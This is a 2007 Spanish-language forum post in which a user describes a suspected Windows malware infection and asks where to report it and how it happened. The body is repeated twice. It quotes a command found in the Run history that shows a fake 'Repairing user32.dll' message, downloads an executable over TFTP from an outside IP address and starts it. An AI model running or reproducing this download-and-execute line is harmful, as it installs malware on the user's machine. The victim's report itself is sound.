otto_xd
22/06/2007, 23:32
Buenas, hoy he sufrido lo que creo que es un ataque o una extraña infeccion bajo windows(tanto usar linux puede haberme creado lafalsa senacion de que siempre estare seguro).
He salido de la uni con un compañero y nos hemos puesto ha jugar a la gc bajo DSCALER, y de repente todo ha empezado a hacer cosas extrañas, como si estubieran intentando cerrar la ventana del programa...
Como me olia algo raro he quitado el cable de red del router y he revisado conexiones, pero no aparecia nada, hasta que le he dado a ejecutar y me he encontrado con esta linea tan bonita :
%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 70.253.45.200 GET fkosqkcj.ex_ & start fkosqkcj&
He quitado la extension para que nadie pueda ejecutarlo desde ejecutar bajo win.
Bueno, he buscado el archivo en win y lo he encontrado, junto con un archivo pf(de esos que dicen que cargar y que no cargar al arranque de win
), de forma que pienso que estoy infectadisimo.
Antivir no me lo reconoce como virus, de hecho no me lo reconoce como nada, pero que el archivo este cargado varias veces en memoria, ademas de tener replicas en cuanto a tamaño de memoria con otros nombres no me deja duda, tengo un virus.
Como el pc lo uso para muchas cosas, pero no tengo nada que no se pueda borrar, asi que terminare por reinstalar win, pero me jode no poder tomar represalias contra el tio que ha hecho esto, ya que mi pc solo lo uso yo, y win lo pongo cada muucho tiempo, y no he ejecutado nada raro, ni parches de juegos)tengo juegos de steam originales ni nada rado.
Donde puedo repotar este virus??Que me recomendais que haga??Como puedo haberme infectado??
Saludos y gracias
He salido de la uni con un compañero y nos hemos puesto ha jugar a la gc bajo DSCALER, y de repente todo ha empezado a hacer cosas extrañas, como si estubieran intentando cerrar la ventana del programa...
Como me olia algo raro he quitado el cable de red del router y he revisado conexiones, pero no aparecia nada, hasta que le he dado a ejecutar y me he encontrado con esta linea tan bonita :
%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 70.253.45.200 GET fkosqkcj.ex_ & start fkosqkcj&
He quitado la extension para que nadie pueda ejecutarlo desde ejecutar bajo win.
Bueno, he buscado el archivo en win y lo he encontrado, junto con un archivo pf(de esos que dicen que cargar y que no cargar al arranque de win
), de forma que pienso que estoy infectadisimo.
Antivir no me lo reconoce como virus, de hecho no me lo reconoce como nada, pero que el archivo este cargado varias veces en memoria, ademas de tener replicas en cuanto a tamaño de memoria con otros nombres no me deja duda, tengo un virus.
Como el pc lo uso para muchas cosas, pero no tengo nada que no se pueda borrar, asi que terminare por reinstalar win, pero me jode no poder tomar represalias contra el tio que ha hecho esto, ya que mi pc solo lo uso yo, y win lo pongo cada muucho tiempo, y no he ejecutado nada raro, ni parches de juegos)tengo juegos de steam originales ni nada rado.
Donde puedo repotar este virus??Que me recomendais que haga??Como puedo haberme infectado??
Saludos y gracias